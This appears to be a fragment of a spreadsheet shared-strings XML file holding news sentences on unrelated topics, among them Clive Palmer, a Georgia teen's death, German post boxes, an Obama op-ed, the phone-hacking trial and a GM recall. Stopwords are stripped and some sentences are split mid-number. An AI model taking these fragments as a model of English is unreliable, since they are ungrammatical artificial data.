  </si>
  <si>
    <t xml:space="preserve"> A better deal British business possible , increasingly necessary eurozone embarks road closer economic fiscal union </t>
  </si>
  <si>
    <t xml:space="preserve"> The priority must jobs growth Britain , findings poll show , business means renewed focus trade fundamental change Brussels &amp;quot; regulatory approach </t>
  </si>
  <si>
    <t xml:space="preserve"> Clive Palmer claims PM Tony Abbott conflict interest parental leave scheme Billionaire MP Clive Palmer says Prime Minister Tony Abbott conflict interest parental leave scheme daughters might get pregnant benefit </t>
  </si>
  <si>
    <t xml:space="preserve"> The mining magnate , dispute paying $ 6 million carbon tax bill , made claim tried brush questions whether conflict </t>
  </si>
  <si>
    <t xml:space="preserve"> The Palmer United Party could control four votes Senate may crucial deciding carbon mining taxes axed </t>
  </si>
  <si>
    <t xml:space="preserve"> But Mr Palmer claimed ministers could conflict interest said Mr Abbott &amp;apos;s daughters stood personally benefit policies </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He &amp;apos;s got major conflict interest comes paid parental leave daughters get pregnant , &amp;apos;ll direct interest whether get leave , &amp;quot; Mr Palmer said </t>
  </si>
  <si>
    <t xml:space="preserve"> Two months election , electoral commission officially declared Mr Palmer winner Sunshine Coast seat Fairfax 53 votes , recount </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Palmer called overhaul election counting speed process </t>
  </si>
  <si>
    <t xml:space="preserve"> Tony Abbott &amp;apos;s daughters Frances Bridget </t>
  </si>
  <si>
    <t xml:space="preserve"> Should election decided two months stopped voting ? &amp;quot; We need better system , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> Why &amp;apos;t system walk , punch details computer , vote immediately result 6</t>
  </si>
  <si>
    <t xml:space="preserve">30 night ? Mr Palmer also criticised use pencils mark ballots </t>
  </si>
  <si>
    <t xml:space="preserve"> Is rub result someone &amp;apos;t like ? In day age pencil seems extraordinary </t>
  </si>
  <si>
    <t xml:space="preserve"> The Electoral Commission studying options electronic voting recently released joint discussion paper New Zealand </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Palmer , 59 , said policies included international airport Sunshine Coast would take &amp;quot; seriously &amp;quot; new job </t>
  </si>
  <si>
    <t xml:space="preserve"> Public office public service </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We seek reward , except reward history critical time serve community , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> The post hardly ever emptied Sundays &amp;quot; Many citizens yet noticed red dots indicating Sunday post collection still found many post boxes town centre districts </t>
  </si>
  <si>
    <t xml:space="preserve"> However , read small print yellow boxes operated Post AG , quickly find boxes longer emptied Sundays holidays , &amp;quot; announced FDP </t>
  </si>
  <si>
    <t xml:space="preserve"> An inquiry FDP confirmed </t>
  </si>
  <si>
    <t xml:space="preserve"> Only post boxes front post office building Ernst-Ludwig-Straße 36 Jakob-Müller-Straße 1 Hüttenfeld still emptied </t>
  </si>
  <si>
    <t xml:space="preserve"> Whether still Sunday collections Hofheim Rosengarten addressed inquiry FDP </t>
  </si>
  <si>
    <t xml:space="preserve"> The FDP spokesperson social youth-related affairs , Fritz Röhrenbeck wants dig deeper </t>
  </si>
  <si>
    <t xml:space="preserve"> The Sunday collection important postal service , especially case scheduled post </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The company radically unacceptably cutting back , despite price increase letters January 2013 </t>
  </si>
  <si>
    <t xml:space="preserve"> Thomas Bittner , Liberal Party Parliamentary Group Municipal Association Chairman , supporting fellow group members: &amp;quot; What annoys , fact collection times changed cancelled quiet &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> In , postal service miles mark comes public accessibility </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; At least post boxes districts Neuschloß Rosengarten must still emptied Sundays , &amp;quot; said Bittner Röhrenbeck unison </t>
  </si>
  <si>
    <t xml:space="preserve"> It also case town centre citizens particular mobile must also able access post box Sunday collection foot </t>
  </si>
  <si>
    <t xml:space="preserve"> In Town Parliament , Röhrenbeck asked whether Town Council planning discussions postal service regarding matter </t>
  </si>
  <si>
    <t xml:space="preserve"> Mayor Erich Maier responded postal service communicated Lampertheim </t>
  </si>
  <si>
    <t xml:space="preserve"> To best knowledge , however , Sunday collection Hofheim </t>
  </si>
  <si>
    <t xml:space="preserve"> Their party spoken favour privatisation </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Decisions made elsewhere , &amp;quot; said Maier </t>
  </si>
  <si>
    <t xml:space="preserve"> Parents Georgia teen died &amp;apos; freak accident &amp;apos; believe son murdered The parents Georgia teenager , whose body found inside rolled-up wrestling mat high school gym , believe son murdered , family &amp;apos;s attorney said Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> Kendrick Johnson , Valdosta , Ga </t>
  </si>
  <si>
    <t xml:space="preserve"> , found Jan </t>
  </si>
  <si>
    <t xml:space="preserve"> 11 stuck upright mat propped behind bleachers inside high school gym </t>
  </si>
  <si>
    <t xml:space="preserve"> Lowndes County sheriff &amp;apos;s investigators concluded Johnson died freak accident , 17-year-old &amp;apos;s family disputes </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They absolutely think son murdered , &amp;quot; Benjamin Crump , attorney representing Kenneth Jacquelyn Johnson , told FoxNews</t>
  </si>
  <si>
    <t>com</t>
  </si>
  <si>
    <t xml:space="preserve"> They never believed died way sheriff concluded </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They believe defies logic , laws physics well common sense , &amp;quot; Crump said </t>
  </si>
  <si>
    <t xml:space="preserve"> They think cover-up protect person people responsible son &amp;apos;s death </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They sent son school book-bag returned body bag , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> U</t>
  </si>
  <si>
    <t xml:space="preserve"> Attorney Michael Moore said Thursday conducting formal investigation Johnson &amp;apos;s death , noting several key questions remain unanswered </t>
  </si>
  <si>
    <t xml:space="preserve"> What cause death ? Was death result crime ? Moore said press conference Thursday afternoon </t>
  </si>
  <si>
    <t xml:space="preserve"> I follow facts wherever lead </t>
  </si>
  <si>
    <t xml:space="preserve"> My objective discovery truth </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I opinion sufficient basis exists &amp;quot; formal investigation , said </t>
  </si>
  <si>
    <t xml:space="preserve"> Moore told reporters initial autopsy indicated Johnson died result &amp;quot; positional asphyxia </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; A second autopsy , however , listed different cause death , according Moore </t>
  </si>
  <si>
    <t xml:space="preserve"> Moore added uncovers sufficient evidence warrant criminal civil rights investigation death Johnson ask FBI conduct </t>
  </si>
  <si>
    <t xml:space="preserve"> A representative Lowndes County Sheriff &amp;apos;s Office immediately available comment contacted Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> A southern Georgia judge Wednesday ordered authorities release surveillance video investigators reviewed </t>
  </si>
  <si>
    <t xml:space="preserve"> The teenager &amp;apos;s parents said hope video footage contain clues died </t>
  </si>
  <si>
    <t xml:space="preserve"> Israeli warplanes attack target inside Syria , official says Israeli warplanes struck target inside Syrian port city Latakia Thursday night , senior administration official confirms Fox News </t>
  </si>
  <si>
    <t xml:space="preserve"> The official specify target , said least one </t>
  </si>
  <si>
    <t xml:space="preserve"> The Associated Press reports target Russian-made SA-125 missiles </t>
  </si>
  <si>
    <t xml:space="preserve"> At least twice earlier year Israel launched airstrikes shipments missiles inside Syria </t>
  </si>
  <si>
    <t xml:space="preserve"> House fire Helmbrechts: Rescue services retrieve charred body The fire service called Helmbrechts late Thursday evening </t>
  </si>
  <si>
    <t xml:space="preserve"> A three-bedroom house district Hof catches fire night </t>
  </si>
  <si>
    <t xml:space="preserve"> Rescue workers retrieve charred body house </t>
  </si>
  <si>
    <t xml:space="preserve"> During fire Helmbrechts , rescue services found charred body three-bedroom house </t>
  </si>
  <si>
    <t xml:space="preserve"> Whether person living house yet unclear , said police spokesperson Bayreuth </t>
  </si>
  <si>
    <t xml:space="preserve"> Late Thursday evening , fire broke ground floor house </t>
  </si>
  <si>
    <t xml:space="preserve"> When fire service arrived , flames already bursting window </t>
  </si>
  <si>
    <t xml:space="preserve"> Rescue workers entered premises found body bedroom </t>
  </si>
  <si>
    <t xml:space="preserve"> This another bedroom completely burnt </t>
  </si>
  <si>
    <t xml:space="preserve"> The entire ground floor suffered damage </t>
  </si>
  <si>
    <t xml:space="preserve"> There residents home fire , continued police spokesperson </t>
  </si>
  <si>
    <t xml:space="preserve"> For time , house longer habitable </t>
  </si>
  <si>
    <t xml:space="preserve"> The precise cause fire initially unclear </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Morris second-year student Harvard Medical School </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;m reading terribly sad book days </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s book I thought would uplift doldrums second-year medical school , renew sense hope </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s called &amp;quot; The Audacity Win , &amp;quot; &amp;apos;s memoir Barack Obama &amp;apos;s 2008 presidential campaign </t>
  </si>
  <si>
    <t xml:space="preserve"> When I &amp;apos;m finished patient write-ups night get bed , book returns time politics inspired millions speeches could take breath away </t>
  </si>
  <si>
    <t xml:space="preserve"> The election turned landslide , news anchors paused reflect historic nature hour </t>
  </si>
  <si>
    <t xml:space="preserve"> My classmates cried joy , parents saved every newspaper could find </t>
  </si>
  <si>
    <t xml:space="preserve"> A young team visionaries headed White House , nation ready change </t>
  </si>
  <si>
    <t xml:space="preserve"> During Obama &amp;apos;s transition office 2008 , 82% approval rating </t>
  </si>
  <si>
    <t xml:space="preserve"> And I close book </t>
  </si>
  <si>
    <t xml:space="preserve"> Cutting present rude awakening , like snapping dream </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s hard remember days optimism -- seem distant memory , sad reminder opportunities gone </t>
  </si>
  <si>
    <t xml:space="preserve"> Change indeed happened , years since I cast first ballot </t>
  </si>
  <si>
    <t xml:space="preserve"> It simply nothing I could imagined </t>
  </si>
  <si>
    <t xml:space="preserve"> I credit Obama great varied accomplishments , passage Affordable Care Act military exit Iraq , end &amp;quot; &amp;apos;t ask &amp;apos;t tell , &amp;quot; killing Osama bin Laden </t>
  </si>
  <si>
    <t xml:space="preserve"> Moreover , I believe partisan obstructionism upended many efforts push nation forward: immigration reform , public option health care , closing base Guantanamo Bay , among others </t>
  </si>
  <si>
    <t xml:space="preserve"> But , countless times I found defending Obama administration colleagues peers , I &amp;apos;ve reached limit explanations I provide </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;ve reached point political despair </t>
  </si>
  <si>
    <t xml:space="preserve"> Republican obstructionism cannot explain allowing bugging foreign leaders , drones strike innocent children overseas </t>
  </si>
  <si>
    <t xml:space="preserve"> It cannot explain National Security Agency collect data private lives Americans , prosecuting whistle-blowers reveal government wrongdoing </t>
  </si>
  <si>
    <t xml:space="preserve"> It cannot account assassinating Anwar al-Awlaki , American citizen , without trial , shirking public funding spending limits presidential campaigns </t>
  </si>
  <si>
    <t xml:space="preserve"> It cannot justify findings report says White House &amp;apos;s efforts silence media &amp;quot; aggressive </t>
  </si>
  <si>
    <t xml:space="preserve"> since Nixon Administration </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; And , recently , cannot excuse failure design simple website three years since Affordable Care Act signed law </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;t know I expected </t>
  </si>
  <si>
    <t xml:space="preserve"> If , 18 years old , I supposed figure governance may contradict political campaigns precede </t>
  </si>
  <si>
    <t xml:space="preserve"> Obviously , elective office &amp;apos;t predictable course , opposing political party random events , Newtown massacre , shape public conversation </t>
  </si>
  <si>
    <t xml:space="preserve"> Yet , examples I listed , largely seem administration &amp;apos;s choosing </t>
  </si>
  <si>
    <t xml:space="preserve"> That troubles </t>
  </si>
  <si>
    <t xml:space="preserve"> I voted Obama 2012 , I excited candidacy </t>
  </si>
  <si>
    <t xml:space="preserve"> Mitt Romney presented confusing unrefined alternative could seem lock policies positions </t>
  </si>
  <si>
    <t xml:space="preserve"> I felt second term Obama , free pressures future elections , would fulfill hope heard long </t>
  </si>
  <si>
    <t xml:space="preserve"> Still , Obama &amp;apos;s approval rating sank 45% week , returning 2008 book become much harder </t>
  </si>
  <si>
    <t xml:space="preserve"> It makes yearn many promises disappeared </t>
  </si>
  <si>
    <t xml:space="preserve"> This week I reading portion book describing Obama suffered huge loss Clinton Pennsylvania primary </t>
  </si>
  <si>
    <t xml:space="preserve"> At post-mortem campaign meeting , told staff needed get back track stay true purpose cause </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I want us get mojo back , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> We &amp;apos;ve got remember </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;apos; It &amp;apos;s five years later , Mr</t>
  </si>
  <si>
    <t xml:space="preserve"> President , I &amp;apos;t agree </t>
  </si>
  <si>
    <t xml:space="preserve"> The opinions expressed commentary solely Nathaniel Morris </t>
  </si>
  <si>
    <t xml:space="preserve"> Even though SG Achim / Baden gone four match days without victory , positive mood still prevailing within top flight handball team </t>
  </si>
  <si>
    <t xml:space="preserve"> Trainer Tomasz Malmon let doubt fact </t>
  </si>
  <si>
    <t xml:space="preserve"> Everyone still fully motivated task hand </t>
  </si>
  <si>
    <t xml:space="preserve"> That said , I hope finally start winning </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I longer remember victory like tastes , &amp;quot; said Malmon , anticipating success team VfL Fredenbeck II </t>
  </si>
  <si>
    <t xml:space="preserve"> Even though third-tier reserves Fredenbeck &amp;apos;t exactly best form moment , Malmon issued warning advance I trained many players A-Youth </t>
  </si>
  <si>
    <t xml:space="preserve"> Consequently , particularly motivated playing former coach </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In addition , wait see whether reinforcements first team , &amp;quot; explained SG coach </t>
  </si>
  <si>
    <t xml:space="preserve"> In case , finally get back winning track , Malmon &amp;apos;s team improve recent performances </t>
  </si>
  <si>
    <t xml:space="preserve"> There major problems , primarily terms covering counter attacking </t>
  </si>
  <si>
    <t xml:space="preserve"> The team &amp;apos;s eye goal must considerably improved </t>
  </si>
  <si>
    <t xml:space="preserve"> Therefore , I hope players finally managed clear heads short break </t>
  </si>
  <si>
    <t xml:space="preserve"> Gutach: Increased safety pedestrians They even 100 metres apart: On Tuesday , new B 33 pedestrian lights Dorfparkplatz Gutach became operational - within view existing Town Hall traffic lights </t>
  </si>
  <si>
    <t xml:space="preserve"> Two sets lights close one another: intentional silly error ? Yesterday , Gutacht &amp;apos;s Mayor gave clear answer question </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; At time , Town Hall traffic lights installed school route , &amp;quot; explained Eckert yesterday </t>
  </si>
  <si>
    <t xml:space="preserve"> The Kluser lights protect cyclists , well travelling bus residents Bergle </t>
  </si>
  <si>
    <t xml:space="preserve"> The system , officially became operational yesterday , importance Sulzbachweg / Kirchstrasse junction </t>
  </si>
  <si>
    <t xml:space="preserve"> We museum , two churches , spa gardens , bus stop , doctor &amp;apos;s practice bank , mention traffic &amp;apos; Grub &amp;apos; residential area </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; At times high road pedestrian traffic , additional set lights required ensure safety , &amp;quot; said Eckert </t>
  </si>
  <si>
    <t xml:space="preserve"> This also confirmed Peter Arnold Offenburg District Office </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; According current measurements , around 12,000 vehicles travel town Gutach B33 daily basis , heavy goods traffic accounts around ten per cent , &amp;quot; emphasised Arnold </t>
  </si>
  <si>
    <t xml:space="preserve"> Therefore construction additional set lights necessary: &amp;quot; Here safety comes first , &amp;apos;s simple , &amp;quot; said Arnold </t>
  </si>
  <si>
    <t xml:space="preserve"> A total four road safety inspections carried roundabout also considered , however , idea rejected account narrowness Sulzbachweg / Kirchstrasse junctions </t>
  </si>
  <si>
    <t xml:space="preserve"> According Arnold , every possible test carried prior selection location traffic light posts: &amp;quot; Using goods vehicle loaded particularly long tree trunks , also tested whether vehicles could access B 33 Sulzbachweg without knocking traffic light posts &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The traffic light system , cost around EUR 15,000 , &amp;quot; modern system currently available market , &amp;quot; explained Arnold </t>
  </si>
  <si>
    <t xml:space="preserve"> The system fitted coloured LEDs , bright enough drivers easily see lights , even sun low sky </t>
  </si>
  <si>
    <t xml:space="preserve"> And also energy-efficient: The older light systems consume around 100 Watts , new ones consuming eight </t>
  </si>
  <si>
    <t xml:space="preserve"> There three sets lights per direction travel </t>
  </si>
  <si>
    <t xml:space="preserve"> If pedestrian presses button traffic lights , top radar sensor checks traffic status </t>
  </si>
  <si>
    <t xml:space="preserve"> If street clear , pedestrian obtains green light immediately , , delay around 15 seconds </t>
  </si>
  <si>
    <t xml:space="preserve"> An additional radar sensor checks whether green phase pedestrian ended </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; If group people disabled persons crossing street , green phase extended , thus ensuring everyone gets safely across street , &amp;quot; explained Arnold </t>
  </si>
  <si>
    <t xml:space="preserve"> Of course , drivers must also play part keep eyes road </t>
  </si>
  <si>
    <t xml:space="preserve"> Yesterday case: The light barely turned green pedestrians luxury vehicle sped red light </t>
  </si>
  <si>
    <t xml:space="preserve"> Fancy glow-in-the-dark ice cream ? A British entrepreneur created world &amp;apos;s first glow-in-the-dark ice cream - using jellyfish </t>
  </si>
  <si>
    <t xml:space="preserve"> Charlie Francis harnessed fluorescent properties marine animal develop luminescent snack </t>
  </si>
  <si>
    <t xml:space="preserve"> He came idea reading research paper jellyfish convinced scientists China chemically recreate glowing protein </t>
  </si>
  <si>
    <t xml:space="preserve"> The ice cream reacts eater &amp;apos;s tongue - raising pH level protein making glow </t>
  </si>
  <si>
    <t xml:space="preserve"> Chris says ice cream lights reacts heat mouth means lick , brighter becomes </t>
  </si>
  <si>
    <t xml:space="preserve"> Charlie , founder &amp;quot; Lick Me I &amp;apos;m Delicious &amp;quot; ice cream company , said: &amp;quot; It incredible stuff still early days terms production , £ 200 gets 2g stuff </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The protein using ice cream reacts tongue neutral pH </t>
  </si>
  <si>
    <t xml:space="preserve"> So mouth warms protein raise pH level ice cream glow </t>
  </si>
  <si>
    <t xml:space="preserve"> We testing past months seemed perfect share Halloween gives wonderful glow effect </t>
  </si>
  <si>
    <t xml:space="preserve"> It probably expensive ice cream I made jellyfish luminescence four times expensive gold </t>
  </si>
  <si>
    <t xml:space="preserve"> So scoop costs around £ 140 </t>
  </si>
  <si>
    <t xml:space="preserve"> It tastes pretty good though </t>
  </si>
  <si>
    <t xml:space="preserve"> Charlie &amp;apos;s experimental company , based Bristol , famed unusual flavours including beer , cheese , beef gold leaf </t>
  </si>
  <si>
    <t xml:space="preserve"> But next creation set even ambitious </t>
  </si>
  <si>
    <t xml:space="preserve"> He said: &amp;quot; I really want develop invisible ice cream </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It inherently impossible refraction caused ice crystals make ice cream , I reckon find way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</si>
  <si>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Gönningen Swabian Alb region </t>
  </si>
  <si>
    <t xml:space="preserve"> The Alb men stood side net undoubtedly experienced team </t>
  </si>
  <si>
    <t xml:space="preserve"> However , soon became evident , due part age , could really keep fast pace Freudenstadt team </t>
  </si>
  <si>
    <t xml:space="preserve"> Gönningen found extremely difficult cope hard well-positioned offensive moves </t>
  </si>
  <si>
    <t xml:space="preserve"> They repeatedly missed passes attacks coming cleanly net Simon Schenk Eduard Schulz blocking game scratch </t>
  </si>
  <si>
    <t xml:space="preserve"> Clear victories first two sets clearly demonstrated superiority Freudenstadt team areas </t>
  </si>
  <si>
    <t xml:space="preserve"> Faced overwhelming match-determining performance , third set following somewhat tame spiritless performance , final score 3: 0 (25: 13 , 25: 14 , 25: 22)</t>
  </si>
  <si>
    <t xml:space="preserve"> On 2 November , play TV Baiersbronn , managed clear victory Nagold , step onto court face much stronger opponent </t>
  </si>
  <si>
    <t xml:space="preserve"> TSV Freudenstadt I: Dominik Bäuerle , Yannik Büchle , Sebastian Dölker , Felix Pälchen , Stefan Räller , Simon Schenk Eduard Schulz </t>
  </si>
  <si>
    <t xml:space="preserve"> In B Class , two teams Baiersbronn Freudenstadt faced Murgtalhalle Baiersbronn </t>
  </si>
  <si>
    <t xml:space="preserve"> They produced hard-fought two-hour match </t>
  </si>
  <si>
    <t xml:space="preserve"> Nerves sides , particularly receiving ball , resulted errors lost points; even lack passing times critical moments overeagerness saw potential points wasted </t>
  </si>
  <si>
    <t xml:space="preserve"> However , evenly matched game , great physical effort Marcus Blasutto &amp;apos;s TSV team proved decisive spite tremendous commitment teams </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</si>
  <si>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</si>
  <si>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Prosecutor Andrew Edis QC told Old Bailey News World heard false rumour May 2005 Clarke seeing &amp;quot; attractive special adviser , &amp;quot; Hannah Pawlby </t>
  </si>
  <si>
    <t xml:space="preserve"> The newspaper tasked private investigator Glenn Mulcaire hacking Pawlby &amp;apos;s voicemails &amp;quot; door-stepped &amp;quot; , Coulson also called left voicemails , court heard </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The prosecution suggests Mr Coulson , editor NotW , man stands outside people &amp;apos;s houses hoping catch , man likes put story people see say , &amp;quot; Mr Edis said </t>
  </si>
  <si>
    <t xml:space="preserve"> He said NotW used three ways investigate stories: phone hacking , surveillance , confrontation </t>
  </si>
  <si>
    <t xml:space="preserve"> The editor personally involved third </t>
  </si>
  <si>
    <t xml:space="preserve"> Obviously knows second , surveillance , must </t>
  </si>
  <si>
    <t xml:space="preserve"> What first ? Does know phone hacking ? He says &amp;apos;t , say &amp;quot; Oh yes , &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Rumours affair involving Clarke first picked NotW &amp;apos;s features desk source sexually interested Ms Pawlby told: &amp;quot; Don &amp;apos;t bother wasting time , &amp;apos;s Charles </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; A tape voicemails taken phone least three occasions seized Mulcaire &amp;apos;s home August 2006 </t>
  </si>
  <si>
    <t xml:space="preserve"> Investigators also found entries private investigator &amp;apos;s computer Ms Pawlby sister &amp;quot; Projects </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; During period investigated , Ms Pawlby &amp;apos;s grandparents received anonymous calls asking information , Mr Edis said </t>
  </si>
  <si>
    <t xml:space="preserve"> Meanwhile , former chief reporter Neville Thurlbeck former reporter James Weatherup oversaw surveillance Ms Pawlby &amp;apos;s movements </t>
  </si>
  <si>
    <t xml:space="preserve"> Leaving voicemail June 18 2005 , Coulson told her: &amp;quot; I &amp;apos;ve got story &amp;apos;re planning run tomorrow I really would like speak Charles </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Mr Edis said Coulson &amp;apos;s involvement story followed pattern important men , former home secretary David Blunkett </t>
  </si>
  <si>
    <t xml:space="preserve"> The jury heard Thursday Coulson confronted Mr Blunkett affair married woman seeing co-defendant Rebekah Brooks , married time </t>
  </si>
  <si>
    <t xml:space="preserve"> Coulson Brooks deny conspiring others hack phones October 3 2000 August 9 2006 </t>
  </si>
  <si>
    <t xml:space="preserve"> Mulcaire , Thurlbeck Weatherup admitted phone hacking </t>
  </si>
  <si>
    <t xml:space="preserve"> Geislingen: More 100 young Catholics Kleiner Heuberg stand together confirmation profession faith In two services , 101 15 16-year-olds Am Kleinen Heuberg pastoral care unit confirmed </t>
  </si>
  <si>
    <t xml:space="preserve"> In morning , service accompanied Laudato-Si Group , afternoon service featured &amp;apos; The Spirit &amp;apos; youth choir </t>
  </si>
  <si>
    <t xml:space="preserve"> Upon receiving confirmation sacrament , young people accepted baptism asked power Holy Spirit </t>
  </si>
  <si>
    <t xml:space="preserve"> Over recent months confirmed , direction Deacon Reiner Dehner assistance several church members , preparing special day </t>
  </si>
  <si>
    <t xml:space="preserve"> In various projects , learned different tasks involved Christian church life attended Youth Day Untermachtal together </t>
  </si>
  <si>
    <t xml:space="preserve"> GM recalls new pickup trucks U</t>
  </si>
  <si>
    <t xml:space="preserve"> fix seatbacks General Motors Co recalling nearly 19,000 all-new 2014 Chevrolet Silverado GMC Sierra pickup trucks repair problem manual reclining seatback , according notice U</t>
  </si>
  <si>
    <t xml:space="preserve"> auto safety regulators Friday </t>
  </si>
  <si>
    <t xml:space="preserve"> On trucks , front seats may defect reclining mechanism </t>
  </si>
  <si>
    <t xml:space="preserve"> As result , seatbacks fail comply federal auto safety standards head restraints </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; If vehicle struck behind , head restraint may properly protect occupants , increasing risk injury , &amp;quot; according notice posted National Highway Traffic Safety Administration website </t>
  </si>
  <si>
    <t xml:space="preserve"> The recalled models built August 1 September 10 </t>
  </si>
  <si>
    <t xml:space="preserve"> GM &amp;apos;s truck roll-out began June represents important vehicle launch No</t>
  </si>
  <si>
    <t xml:space="preserve"> 1 U</t>
  </si>
  <si>
    <t xml:space="preserve"> automaker since 2009 bankruptcy restructuring </t>
  </si>
  <si>
    <t xml:space="preserve"> GM told truck owners defect first half October </t>
  </si>
  <si>
    <t xml:space="preserve"> NHTSA could review owner notification letter due 16-day government shutdown , tempered auto sales growth October </t>
  </si>
  <si>
    <t xml:space="preserve"> Sales Silverado Sierra trucks , redesigned 2014 model year , 20 percent first 10 months year , GM said Friday </t>
  </si>
  <si>
    <t xml:space="preserve"> In October , GM sold 42,660 Silverado 16,503 Sierra pickup trucks </t>
  </si>
  <si>
    <t xml:space="preserve"> GM shares 1</t>
  </si>
  <si>
    <t>4 percent $ 37</t>
  </si>
  <si>
    <t xml:space="preserve">47 New York Stock Exchange Friday afternoon </t>
  </si>
  <si>
    <t xml:space="preserve"> UN hails new goals tackle poverty The United Nations start work immediately new set goals replace millennium development goals , put place 12 years ago tackle global poverty </t>
  </si>
  <si>
    <t xml:space="preserve"> Australian diplomats played key role pushing &amp;quot; sustainable development goals &amp;quot; replace MDGs , expire 2015 , ahead UN sustainable development summit began Rio de Janeiro overnight </t>
  </si>
  <si>
    <t xml:space="preserve"> They included final draft document , endorsed world leaders including Ms Gillard summit </t>
  </si>
  <si>
    <t xml:space="preserve"> UN Secretary-General Ban Ki-moon told summit overnight time &amp;quot; rise national interests </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; &amp;quot; I pleased member states agreed launch take ownership process establish universal sustainable development goals - SDGs , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> These SDGs build advances millennium development goals , integral part post-2015 development framework </t>
  </si>
  <si>
    <t xml:space="preserve"> I spare effort implement mandate given member states realise vision sustainable development goals build success MDGs </t>
  </si>
  <si>
    <t xml:space="preserve"> Mastering struggle perfection </t>
  </si>
  <si>
    <t xml:space="preserve"> The role Santiago , old man Hemingway &amp;apos;s novel &amp;quot; The Old Man Sea &amp;quot; , perfectly suited Horst Janson </t>
  </si>
  <si>
    <t xml:space="preserve"> Janson old hand comes profession , art acting </t>
  </si>
  <si>
    <t xml:space="preserve"> The old man , Santiago , best comes fishing </t>
  </si>
  <si>
    <t xml:space="preserve"> As , pair complement one another superbly </t>
  </si>
  <si>
    <t xml:space="preserve"> You almost think see folds old man &amp;apos;s neck , young fisherman Manolo speaks </t>
  </si>
  <si>
    <t xml:space="preserve"> When Santiago sits arched chair , tired life , genuine emotion Janson </t>
  </si>
  <si>
    <t xml:space="preserve"> Furthermore , role old fisherman character role , , Janson masters excellently </t>
  </si>
  <si>
    <t xml:space="preserve"> Hemingway told story fighter , courageous man &amp;apos;t give ultimately wins battle fish result knowledge strong </t>
  </si>
  <si>
    <t xml:space="preserve"> For long periods , Janson performer stage </t>
  </si>
  <si>
    <t xml:space="preserve"> He manages focus audience &amp;apos;s attention , result monologues never become boring , even moment </t>
  </si>
  <si>
    <t xml:space="preserve"> His efforts finally pull fish surface water genuine members audience forget sea question consists merely water bottles , illuminated blue </t>
  </si>
  <si>
    <t xml:space="preserve"> Director Jens Hasselmann old man boat perform front Fischerdorf </t>
  </si>
  <si>
    <t xml:space="preserve"> During course performance respective active scene illuminated </t>
  </si>
  <si>
    <t xml:space="preserve"> Santiago &amp;apos;s cabin bar singer Marie-Luise Gunst , sings Cuban lifestyle , songs beautiful voice </t>
  </si>
  <si>
    <t xml:space="preserve"> The four musicians accompany Cuban rhythms guests bar time </t>
  </si>
  <si>
    <t xml:space="preserve"> CDC issues children &amp;apos;s allergy guidelines schools On Wednesday , Centers Disease Control Prevention released set guidelines manage children &amp;apos;s food allergies school </t>
  </si>
  <si>
    <t xml:space="preserve"> This first set guidelines U</t>
  </si>
  <si>
    <t xml:space="preserve"> government put , number school-age children suffering food allergies climbs </t>
  </si>
  <si>
    <t xml:space="preserve"> One 20 children United States food allergies </t>
  </si>
  <si>
    <t xml:space="preserve"> The CDC found prevalence food allergies among children increased 18 percent 1997 2007 </t>
  </si>
  <si>
    <t xml:space="preserve"> The guide contains information schools make faculty staff aware children &amp;apos;s food allergies , handle allergic reaction occur </t>
  </si>
  <si>
    <t xml:space="preserve"> It also recommends schools epinephrine stocked -- EpiPen brand auto-injector commonly used -- respond potentially fatal anaphylaxis </t>
  </si>
  <si>
    <t xml:space="preserve"> State legislatures recently updating rules allow schools stock epinephrine easily </t>
  </si>
  <si>
    <t xml:space="preserve"> The report also includes list typical symptoms communicated children allergic reaction </t>
  </si>
  <si>
    <t xml:space="preserve"> Kids may say , &amp;quot; It feels like something poking tongue , &amp;quot; &amp;quot; My tongue feels like hair , &amp;quot; &amp;quot; My tongue tingling </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Basketball: Hopes growing Neckar Riesen (Neckar Giants)</t>
  </si>
  <si>
